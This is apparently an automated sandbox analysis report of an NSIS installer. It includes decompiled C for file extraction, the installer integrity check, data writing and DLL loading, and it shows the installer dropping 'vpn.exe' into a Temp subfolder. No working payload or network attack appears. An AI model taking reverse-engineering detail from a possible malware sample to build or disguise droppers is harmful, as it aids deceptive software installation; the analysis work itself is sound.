.DEFAULT\Control Panel\International, xrefs: 004059C5
F, xrefs: 00405A22
RichEd20, xrefs: 00405BC9
"F, xrefs: 00405A4B
_Nb, xrefs: 00405AFD
RichEd32, xrefs: 00405BD4

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-2746725676
Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

Uniqueness

Uniqueness Score: -1.00%

Function 00401A1F, Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00401A1F(FILETIME* __ebx) {
				signed int _t31;
				void* _t35;
				void* _t43;
				void* _t45;
				void* _t51;
				void* _t67;
				void* _t74;
				FILETIME* _t83;
				signed int _t94;
				void* _t96;
				void* _t98;
				WCHAR* _t100;
				WCHAR* _t101;
				void* _t103;

				_t83 = __ebx;
				_t100 = E0040145C(_t96, 0x31);
				_t31 =  *(_t103 - 0x2c);
				_push(_t100);
				_push(_t31 >> 0x00000003 & 0x00000002);
				 *(_t103 - 0x34) = _t100;
				 *(_t103 + 8) = _t31 & 0x00000007;
				E004062CF(L"File: overwriteflag=%d, allowskipfilesflag=%d, name=\"%s\"", _t31 & 0x00000007);
				_t35 = E00405D51(_t100);
				_push(_t100);
				_t101 = L"\"C:\\Users\\alfons\\AppData\\Local\\Temp\\New Feature\\vpn.exe\"";
				if(_t35 == 0) {
					lstrcatW(E0040674E(E00406035(_t101, 0x4d70b0)), ??);
				} else {
					E00406035();
				}
				E00406064(_t101);
				L6:
				L6:
				if( *(_t103 + 8) >= 3) {
					_t74 = E00406301(_t101);
					_t94 = 0;
					if(_t74 != _t83) {
						_t94 = CompareFileTime(_t74 + 0x14, _t103 - 0x20);
					}
					asm("sbb eax, eax");
					 *(_t103 + 8) =  ~(( *(_t103 + 8) + 0xfffffffd | 0x80000000) & _t94) + 1;
				}
				if( *(_t103 + 8) == _t83) {
					E00405E5C(_t101);
				}
				_t43 = E00405E7C(_t101, 0x40000000, (0 |  *(_t103 + 8) != 0x00000001) + 1);
				 *(_t103 - 8) = _t43;
				if(_t43 != 0xffffffff) {
					goto L24;
				}
				if( *(_t103 + 8) != _t83) {
					E00404F9E(0xffffffe2,  *(_t103 - 0x34));
					if( *(_t103 + 8) == 2) {
						 *((intOrPtr*)(_t103 - 4)) = 1;
					}
					_push( *(_t103 + 8));
					_push(_t101);
					_push(L"File: skipped: \"%s\" (overwriteflag=%d)");
					E004062CF();
					L33:
					 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t103 - 4));
					goto L34;
				} else {
					E004062CF(L"File: error creating \"%s\"", _t101);
					E00406035(0x4140f8, 0x47f000);
					E00406035(0x47f000, _t101);
					E00406831(_t83, 0x4140f8, _t101, 0x4100f0,  *((intOrPtr*)(_t103 - 0x18)));
					E00406035(0x47f000, 0x4140f8);
					_t67 = E00405CCC(0x4100f0,  *(_t103 - 0x2c) >> 3) - 4;
					if(_t67 != 0) {
						if(_t67 == 1) {
							_push(L"File: error, user cancel");
							E004062CF();
							 *0x47eb68 =  *0x47eb68 + 1;
							L34:
							_t51 = 0;
						} else {
							_push(L"File: error, user abort");
							E004062CF();
							_push(_t101);
							_push(0xfffffffa);
							E00404F9E();
							L2:
							_t51 = 0x7fffffff;
						}
					} else {
						_push(L"File: error, user retry");
						E004062CF();
						goto L6;
					}
				}
				L35:
				return _t51;
				L24:
				E00404F9E(0xffffffea,  *(_t103 - 0x34));
				 *0x47eb94 =  *0x47eb94 + 1;
				_t45 = E0040337F( *((intOrPtr*)(_t103 - 0x24)),  *(_t103 - 8), _t83, _t83); // executed
				 *0x47eb94 =  *0x47eb94 - 1;
				_t98 = _t45;
				_push(_t101);
				E004062CF(L"File: wrote %d to \"%s\"", _t98);
				if( *(_t103 - 0x20) != 0xffffffff ||  *((intOrPtr*)(_t103 - 0x1c)) != 0xffffffff) {
					SetFileTime( *(_t103 - 8), _t103 - 0x20, _t83, _t103 - 0x20); // executed
				}
				FindCloseChangeNotification( *(_t103 - 8)); // executed
				if(_t98 >= _t83) {
					goto L33;
				} else {
					if(_t98 != 0xfffffffe) {
						E00406831(_t83, _t98, _t101, _t101, 0xffffffee);
					} else {
						E00406831(_t83, _t98, _t101, _t101, 0xffffffe9);
						lstrcatW(_t101,  *(_t103 - 0x34));
					}
					E004062CF(L"%s", _t101);
					_push(0x200010);
					_push(_t101);
					E00405CCC();
					goto L2;
				}
				goto L35;
			}

0x00401a1f
0x00401a26
0x00401a28
0x00401a30
0x00401a37
0x00401a3e
0x00401a41
0x00401a44
0x00401a4d
0x00401a52
0x00401a53
0x00401a5a
0x00401a76
0x00401a5c
0x00401a5d
0x00401a5d
0x00401a7c
0x00000000
0x00401a86
0x00401a8a
0x00401a8d
0x00401a92
0x00401a96
0x00401aa6
0x00401aa6
0x00401ab7
0x00401aba
0x00401aba
0x00401ac0
0x00401ac3
0x00401ac3
0x00401ad9
0x00401ade
0x00401ae4
0x00000000
0x00000000
0x00401aed
0x00401b6b
0x00401b74
0x00401b76
0x00401b76
0x00401b7d
0x00401b80
0x00401b81
0x00401b86
0x004030e3
0x004030e6
0x00000000
0x00401aef
0x00401af5
0x00401b02
0x00401b0d
0x00401b1a
0x00401b25
0x00401b3b
0x00401b3e
0x00401b51
0x00401b93
0x00401b98
0x00401b9d
0x004030ec
0x004030ec
0x00401b53
0x00401b53
0x00401b58
0x00401b5e
0x00401b5f
0x0040162d
0x00401632
0x00401632
0x00401632
0x00401b40
0x00401b40
0x00401b45
0x00000000
0x00401b4a
0x00401b3e
0x004030ee
0x004030f2
0x00401ba9
0x00401bae
0x00401bb3
0x00401bc1
0x00401bc6
0x00401bcc
0x00401bce
0x00401bd5
0x00401be1
0x00401bf2
0x00401bf2
0x00401bfb
0x00401c03
0x00000000
0x00401c09
0x00401c0c
0x00401c24
0x00401c0e
0x00401c11
0x00401c1a
0x00401c1a
0x00401c2f
0x00401c36
0x00401c3b
0x00401c3c
0x00000000
0x00401c3c
0x00000000

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

lstrcatW.KERNEL32(00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe","C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe",00000000,00000000,"C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe",004D70B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424E27,7519EA30,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424E27,7519EA30,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Strings

File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: wrote %d to "%s", xrefs: 00401BD0
"C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe", xrefs: 00401A53, 00401A5C, 00401A69, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: error, user retry, xrefs: 00401B40
File: error, user cancel, xrefs: 00401B93
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
File: error creating "%s", xrefs: 00401AF0
File: error, user abort, xrefs: 00401B53

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: "C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe"$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
API String ID: 4286501637-2197606473
Opcode ID: b40734ecde32878f7b7f7684724e5065f9505b71d87d6c0afa40b5fe240a0399
Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
Opcode Fuzzy Hash: b40734ecde32878f7b7f7684724e5065f9505b71d87d6c0afa40b5fe240a0399
Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

Uniqueness

Uniqueness Score: -1.00%

Function 004035B3, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E004035B3(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				 *0x47eb00 = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, 0x4eb0d8, 0x2004);
				_t89 = E00405E7C(0x4eb0d8, 0x80000000, 3);
				_v16 = _t89;
				 *0x40c010 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406035(0x4db0b8, 0x4eb0d8);
				E00406035(0x4ef0e0, E0040677D(0x4db0b8));
				_t50 = GetFileSize(_t89, 0);
				 *0x43dd38 = _t50;
				_t93 = _t50;
				__eflags = _t50;
				if(_t50 <= 0) {
					L24:
					E004032D2(1);
					__eflags =  *0x47eb0c - _t82;
					if( *0x47eb0c == _t82) {
						goto L36;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E00403368( *0x47eb0c + 0x1c);
						_t57 = E0040337F(0xffffffff, _t82, _t94, _v24);
						__eflags = _t57 - _v24;
						if(_t57 != _v24) {
							goto L36;
						}
						__eflags = _v44 & 0x00000001;
						 *0x47eabc = _t94;
						 *0x47eb08 =  *_t94;
						if((_v44 & 0x00000001) != 0) {
							 *0x47eb04 =  *0x47eb04 + 1;
							__eflags =  *0x47eb04;
						}
						_t85 = 8;
						_t40 = _t94 + 0x44; // 0x44
						_t59 = _t40;
						do {
							_t59 = _t59 - 8;
							 *_t59 =  *_t59 + _t94;
							_t85 = _t85 - 1;
							__eflags = _t85 - _t82;
						} while (_t85 != _t82);
						_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
						 *(_t94 + 0x3c) = _t60;
						E00405E38(0x47eac0, _t94 + 4, 0x40);
						__eflags = 0;
						return 0;
					}
					E00403368( *0x42c174);
					_t65 = E00403336( &_a4, 4); // executed
					__eflags = _t65;
					if(_t65 == 0) {
						goto L36;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L36;
					}
					goto L28;
				} else {
					do {
						asm("sbb eax, eax");
						_t70 = ( ~( *0x47eb0c) & 0x00007e00) + 0x200;
						_t90 = _t93;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403336(0x42c178, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E004032D2(1);
							L36:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x47eb0c;
						if( *0x47eb0c != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E004032D2(0);
							}
							goto L20;
						}
						E00405E38( &_v44, 0x42c178, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x42c174; // 0x132eb7
						 *0x47eb80 =  *0x47eb80 | _a4 & 0x00000002;
						_t80 = _v20;
						 *0x47eb0c = _t87;
						__eflags = _t80 - _t93;
						if(_t80 > _t93) {
							goto L36;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40a264
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x43dd38; // 0x132ebb
						if(__eflags < 0) {
							_v12 = E004072AD(_v12, 0x42c178, _t90);
						}
						 *0x42c174 =  *0x42c174 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x004035bb
0x004035be
0x004035c1
0x004035db
0x004035e0
0x004035f3
0x004035f5
0x004035f8
0x00403601
0x00000000
0x00403603
0x00403614
0x00403625
0x0040362c
0x00403632
0x00403637
0x00403639
0x0040363b
0x00403728
0x0040372a
0x00403730
0x00403736
0x00000000
0x00000000
0x0040373c
0x0040373f
0x0040376b
0x00403770
0x00403776
0x00403781
0x0040378d
0x00403792
0x00403795
0x00000000
0x00000000
0x00403797
0x0040379b
0x004037a3
0x004037a8
0x004037aa
0x004037aa
0x004037aa
0x004037b2
0x004037b3
0x004037b3
0x004037b6
0x004037b6
0x004037b9
0x004037bb
0x004037bc
0x004037bc
0x004037c7
0x004037cd
0x004037db
0x004037e0
0x00000000
0x004037e0
0x00403747
0x00403752
0x00403757
0x00403759
0x00000000
0x00000000
0x00403762
0x00403765
0x00000000
0x00000000
0x00000000
0x00403641
0x00403646
0x0040364d
0x00403654
0x00403659
0x0040365b
0x0040365d
0x0040365f
0x0040365f
0x00403663
0x00403668
0x0040366a
0x004037eb
0x004037f1
0x00000000
0x004037f1
0x00403670
0x00403677
0x004036f3
0x004036f7
0x004036fb
0x00403700
0x00000000
0x004036f7
0x00403680
0x00403685
0x00403688
0x0040368d
0x00000000
0x00000000
0x0040368f
0x00403696
0x00000000
0x00000000
0x00403698
0x0040369f
0x00000000
0x00000000
0x004036a1
0x004036a8
0x00000000
0x00000000
0x004036aa
0x004036b1
0x00000000
0x00000000
0x004036b3
0x004036b9
0x004036c2
0x004036c8
0x004036cb
0x004036d1
0x004036d3
0x00000000
0x00000000
0x004036d9
0x004036dd
0x004036e5
0x004036e5
0x004036e8
0x004036e8
0x004036eb
0x004036ed
0x004036ef
0x004036ef
0x00000000
0x004036ed
0x004036df
0x004036e3
0x00000000
0x00000000
0x00000000
0x00403701
0x00403701
0x00403707
0x00403713
0x00403713
0x00403716
0x0040371c
0x0040371e
0x0040371e
0x00403726
0x00403726
0x00000000
0x00403726

APIs

GetTickCount.KERNEL32 ref: 004035C4
GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C

Strings

Error launching installer, xrefs: 00403603
Null, xrefs: 004036AA
soft, xrefs: 004036A1
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
Inst, xrefs: 00403698

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
Opcode Fuzzy Hash: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040337F, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 175
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040337F(int _a4, void* _a8, long _a12, int _a16) {
				struct _OVERLAPPED* _v8;
				long _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				short _v156;
				void* _t66;
				void* _t68;
				long _t73;
				intOrPtr _t78;
				long _t79;
				void* _t81;
				int _t83;
				void* _t93;
				void* _t100;
				long _t101;
				int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t93 = _a12;
				_t102 = _a16;
				_v12 = _t102;
				if(_t93 == 0) {
					_v12 = 0x8000;
				}
				_v8 = 0;
				_v16 = _t93;
				if(_t93 == 0) {
					_v16 = 0x424170;
				}
				_t64 = _a4;
				if(_a4 >= 0) {
					E00403368( *0x47eaf8 + _t64);
				}
				_t66 = E00403336( &_a16, 4); // executed
				if(_t66 != 0) {
					if((_a16 & 0x80000000) == 0) {
						if(_t93 == 0) {
							while(_a16 > 0) {
								_t103 = _v12;
								if(_a16 < _t103) {
									_t103 = _a16;
								}
								if(E00403336(0x420170, _t103) == 0) {
									goto L7;
								}
								if(WriteFile(_a8, 0x420170, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
									L31:
									_push(0xfffffffe);
									goto L8;
								} else {
									_v8 = _v8 + _t103;
									_a16 = _a16 - _t103;
									continue;
								}
							}
							L37:
							return _v8;
						}
						if(_a16 < _t102) {
							_t102 = _a16;
						}
						if(E00403336(_t93, _t102) == 0) {
							goto L7;
						} else {
							_v8 = _t102;
							goto L37;
						}
					}
					_t73 = GetTickCount();
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_v20 = _t73;
					 *0x43dd30 = 0x435d28;
					 *0x43dd2c = 0x435d28;
					 *0x434188 = 8;
					 *0x4346a4 = 0;
					 *0x4346a0 = 0;
					 *0x43dd28 = 0x43dd28;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L37;
					} else {
						goto L11;
					}
					while(1) {
						L11:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E00403336(0x420170, _t104) == 0) {
							goto L7;
						}
						_a16 = _a16 - _t104;
						 *0x434178 = 0x420170;
						 *0x43417c = _t104;
						while(1) {
							_t100 = _v16;
							 *0x434180 = _t100;
							 *0x434184 = _v12;
							_t78 = E004076A0(0x434178);
							_v24 = _t78;
							if(_t78 < 0) {
								break;
							}
							_t105 =  *0x434180; // 0x424e27
							_t106 = _t105 - _t100;
							_t79 = GetTickCount();
							_t101 = _t79;
							if(( *0x47eb94 & 0x00000001) != 0 && (_t79 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v156, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404F9E(0,  &_v156);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L11;
								}
								goto L37;
							} else {
								if(_a12 != 0) {
									_t81 =  *0x434180; // 0x424e27
									_v8 = _v8 + _t106;
									_v12 = _v12 - _t106;
									_v16 = _t81;
									L26:
									if(_v24 != 1) {
										continue;
									}
									goto L37;
								}
								_t83 = WriteFile(_a8, _v16, _t106,  &_v28, 0); // executed
								if(_t83 == 0 || _v28 != _t106) {
									goto L31;
								} else {
									_v8 = _v8 + _t106;
									goto L26;
								}
							}
						}
						_push(0xfffffffc);
						goto L8;
					}
					goto L7;
				} else {
					L7:
					_push(0xfffffffd);
					L8:
					_pop(_t68);
					return _t68;
				}
			}

0x00403389
0x0040338d
0x00403393
0x00403398
0x0040339a
0x0040339a
0x004033a1
0x004033a4
0x004033a9
0x004033ab
0x004033ab
0x004033b2
0x004033b7
0x004033c2
0x004033c2
0x004033cd
0x004033d4
0x004033e5
0x00403548
0x004035ac
0x0040356e
0x00403574
0x00403576
0x00403576
0x00403587
0x00000000
0x00000000
0x0040359f
0x0040353f
0x0040353f
0x00000000
0x004035a6
0x004035a6
0x004035a9
0x00000000
0x004035a9
0x0040359f
0x00403564
0x00000000
0x00403564
0x0040354d
0x0040354f
0x0040354f
0x0040355b
0x00000000
0x00403561
0x00403561
0x00000000
0x00403561
0x0040355b
0x004033f1
0x004033f3
0x004033f3
0x004033fa
0x00403402
0x00403407
0x0040340f
0x00403419
0x0040341f
0x00403425
0x0040342f
0x00403432
0x00000000
0x00000000
0x00000000
0x00000000
0x00403438
0x00403438
0x00403438
0x00403440
0x00403442
0x00403442
0x00403453
0x00000000
0x00000000
0x00403455
0x00403458
0x0040345e
0x00403464
0x00403467
0x0040346f
0x00403475
0x0040347a
0x0040347f
0x00403484
0x00000000
0x00000000
0x0040348a
0x00403490
0x00403492
0x0040349b
0x0040349d
0x004034ce
0x004034d4
0x004034e0
0x004034e5
0x004034e5
0x004034ec
0x00403530
0x00000000
0x00000000
0x00000000
0x004034ee
0x004034f1
0x00403513
0x00403518
0x0040351b
0x0040351e
0x00403521
0x00403525
0x00000000
0x00000000
0x00000000
0x0040352b
0x004034ff
0x00403507
0x00000000
0x0040350e
0x0040350e
0x00000000
0x0040350e
0x00403507
0x004034ec
0x00403538
0x00000000
0x00403538
0x00000000
0x004033d6
0x004033d6
0x004033d6
0x004033d8
0x004033d8
0x00000000
0x004033d8

APIs

GetTickCount.KERNEL32 ref: 004033F1
GetTickCount.KERNEL32 ref: 00403492
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
wsprintfW.USER32 ref: 004034CE
WriteFile.KERNELBASE(00000000,00000000,00424E27,00403792,00000000), ref: 004034FF
WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597

Strings

pAB, xrefs: 004033AB
... %d%%, xrefs: 004034C8
'NB, xrefs: 0040346F, 0040348A, 00403513
(]C, xrefs: 004033FD

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: 'NB$(]C$... %d%%$pAB
API String ID: 651206458-4227808059
Opcode ID: cb4c91118d633cdc657fe6c8c56820a3b26f1ee58aa4180b17ceb2c9431ae53d
Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
Opcode Fuzzy Hash: cb4c91118d633cdc657fe6c8c56820a3b26f1ee58aa4180b17ceb2c9431ae53d
Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004023F0, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83
libraryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E004023F0(void* __ebx) {
				void* _t28;

				 *(_t28 - 4) = 1;
				if( *0x47eb98 < __ebx) {
					E00404F9E(0xffffffe7, 0x4100f0);
					_push(L"Error registering DLL: Could not initialize OLE");
					E004062CF();
					goto L2;
				} else {
					__edi = E0040145C(__edx, 0xfffffff0);
					 *((intOrPtr*)(__ebp - 8)) = E0040145C(__edx, 1);
					if( *((intOrPtr*)(__ebp - 0x1c)) == __ebx) {
						L6:
						__eax = LoadLibraryExW(__edi, __ebx, 8); // executed
						 *(__ebp + 8) = __eax;
						if(__eax == __ebx) {
							__eax = E00404F9E(0xfffffff6, 0x4100f0);
							_push(__edi);
							_push(L"Error registering DLL: Could not load %s");
							__eax = E004062CF();
							L2:
						} else {
							goto L7;
						}
					} else {
						__eax = GetModuleHandleW(__edi); // executed
						 *(__ebp + 8) = __eax;
						if(__eax != __ebx) {
							L7:
							__esi = E00406391( *(__ebp + 8),  *((intOrPtr*)(__ebp - 8)));
							if(__esi == __ebx) {
								__eax = E00404F9E(0xfffffff7,  *((intOrPtr*)(__ebp - 8)));
								_push(__edi);
								__eax = E004062CF(L"Error registering DLL: %s not found in %s",  *((intOrPtr*)(__ebp - 8)));
							} else {
								 *(__ebp - 4) = __ebx;
								if( *((intOrPtr*)(__ebp - 0x24)) == __ebx) {
									__eax =  *__esi( *((intOrPtr*)(__ebp - 0xc)), 0x2004, 0x47f000, 0x40c0e0, "`�G"); // executed
									__esp = __esp + 0x14;
								} else {
									__eax = E00401435( *((intOrPtr*)(__ebp - 0x24)));
									if( *__esi() != 0) {
										 *(__ebp - 4) = 1;
									}
								}
							}
							if( *((intOrPtr*)(__ebp - 0x20)) == __ebx && E00403CE4( *(__ebp + 8)) != 0) {
								__eax = FreeLibrary( *(__ebp + 8));
							}
						} else {
							goto L6;
						}
					}
				}
				 *0x47eb68 =  *0x47eb68 +  *(_t28 - 4);
				return 0;
			}

0x004023f0
0x004023fd
0x004024ec
0x004024f1
0x004017a6
0x00000000
0x00402403
0x0040240c
0x00402413
0x00402419
0x00402429
0x0040242d
0x00402433
0x00402438
0x004024d5
0x004024da
0x004024db
0x00401957
0x004017ab
0x00000000
0x00000000
0x00000000
0x0040241b
0x0040241c
0x00402422
0x00402427
0x0040243e
0x00402449
0x0040244d
0x00402491
0x00402496
0x0040249f
0x0040244f
0x0040244f
